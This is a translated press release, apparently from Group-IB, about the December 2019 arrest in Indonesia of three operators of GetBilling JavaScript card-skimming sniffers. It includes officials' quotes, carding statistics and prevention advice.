The Indonesian cyber police, together with Interpol and Group-IB, announced the arrest of members of a criminal group that infected hundreds of online stores in Australia, Brazil, the United Kingdom, Germany, Indonesia, the United States and other countries with JavaScript sniffers-a popular type of malicious code. Among the victims are Russian and Ukrainian users. Criminals stole bank card details from customers and used them to buy gadgets and luxury goods. The elimination of this criminal group was the first successful operation against JS-sniffer operators in the Asia-Pacific region (APAC).
The joint operation" Night Fury " of the Indonesian cyber police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and the Group-IB investigation Department at APAC was conducted in December 2019 — as a result, three Indonesian residents aged between 23 and 35 were arrested. All of them are charged with stealing electronic data using GetBilling sniffers. The operation continues in 5 other regions of the Asia-Pacific region.
The GetBilling family of sniffers was first described in the Group-IB Crime Without Punishment report in April 2019. JavaScript sniffers are a popular type of malicious code that is used in attacks on online stores to steal customers ' personal and payment data: bank card numbers, names, addresses, logins, phone numbers, and user data from payment systems. Threat Intelligence Group-IB specialists have been tracking the GetBilling JS-sniffer family since 2018. An analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they managed to infect almost 200 websites in Indonesia, Australia, Europe, the United States, South America and some other countries.
Indonesian footprint
Last year, the Group-IB investigation team was able to establish that part of the GetBilling infrastructure was deployed in Indonesia. INTERPOL's ASEAN Desk promptly informed the Indonesian cyber police about this. Despite the fact that the GetBilling sniffer operators tried to hide their location, for example, criminals always used a VPN to connect to the server to collect stolen data and control the sniffer, and only used stolen cards to pay for hosting services and purchase new domains, Group-IB experts, together with local police officers, managed to collect evidence that the group works out of Indonesia and then get on the trail of the suspects themselves.
"In today's digital world, cybercriminals are rapidly adopting cutting — edge technologies to hide their illegal activities and steal large amounts of personal data for financial gain," said Craig Jones, Director of Cybercrime Investigations at INTERPOL. "Ensuring that law enforcement agencies have access to the information they need to fight cybercrime requires a strong and fruitful partnership between police and information security experts."
Example of a malicious GetBilling script
Example of recording stolen payment and personal data stored on GetBilling servers.
"This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia, but attacked e-commerce resources around the world, which made it more difficult to collect evidence, search for victims and prosecute," says Vesta Matveeva, Head of Information Security Incident Investigations at APAC Group-IB. "However, international cooperation and data sharing can help effectively counteract current cyber threats. Thanks to the rapid actions of the Indonesian cyber police and Interpol, "Night Fury" became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an excellent example of a coordinated cross-border fight against cybercrime, and we are proud that the result of our Threat Intelligence, understanding of criminal schemes and their investigation, as well as forensic data analysis by Group-IB specialists helped to identify suspects. We hope that this case will set a precedent for law enforcement agencies in other jurisdictions as well."
During the search, the police seized laptops, mobile phones of various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment data was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian websites below market value. The suspects have already been charged with stealing electronic data — a crime punishable by up to ten years in prison under Indonesia's criminal code. The investigation continues.
"The coordination of efforts between the Indonesian cyber Police, Interpol and Group-IB allowed attributing crimes, identifying criminals who used sniffers, and arresting them," said Idam Wasiyadin, Superintendent of the Indonesian Police. — But more importantly, it has helped protect innocent people and raise public awareness of cybercrime and its consequences."
Sniffers raise their heads
According to the annual report of High-Tech Crime Trends Group-IB for the period H2 2018-H1 2019, the total number of compromised bank cards uploaded to underground forums in the world increased from 27.1 million to 43.8 million. Dumps — a copy of magnetic stripe information - still account for the main share of the carding market, their number increased by 46%. Sales of text data (number, CVV, expiration date) are also on the rise, with a 19% increase. The most massive bank card data leaks are related to the compromise of retail in the United States. In terms of the number of compromised cards, the United States ranks first by a large margin — 93%.
One of the reasons for the increase in the volume of stolen text data was JS sniffers. In the spring of 2019, in the Group-IB report "Crime without Punishment", its author, Viktor Okorokov, an analyst at Group-IB, listed 38 families of JS sniffers. Since then, the number of JS sniffer families detected by the company has almost doubled and continues to grow. Their victims have already become the websites of British Airways, the international giant of sporting goods FILA. Most recently, in December 2019, JS sniffers hit the APAC region, infecting the websites of the Singapore fashion brand "Love, Bonito".
To avoid financial losses due to JS sniffers, Group-IB experts recommend that online users create a separate bank card or even a separate bank account for online payments, and set limits on card spending. Online store owners, in turn, should regularly update their software and conduct cybersecurity audits and assessments of their web resources.
Group-IB knows everything about cybercrime, but they tell you the most interesting things.
Action-packed Telegram channel (https://t.me/Group_IB) about information security, hackers and cyberattacks, hacktivists and Internet pirates. Step-by-step investigations of sensational cybercrimes, practical cases using Group-IB technologies, and, of course, recommendations on how not to become a victim on the Internet.
Group-IB photo feed on Instagram www.instagram.com/group_ib
Short news on Twitter twitter.com/GroupIB
Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, detecting fraud and protecting intellectual property on the web, with its headquarters in Singapore.
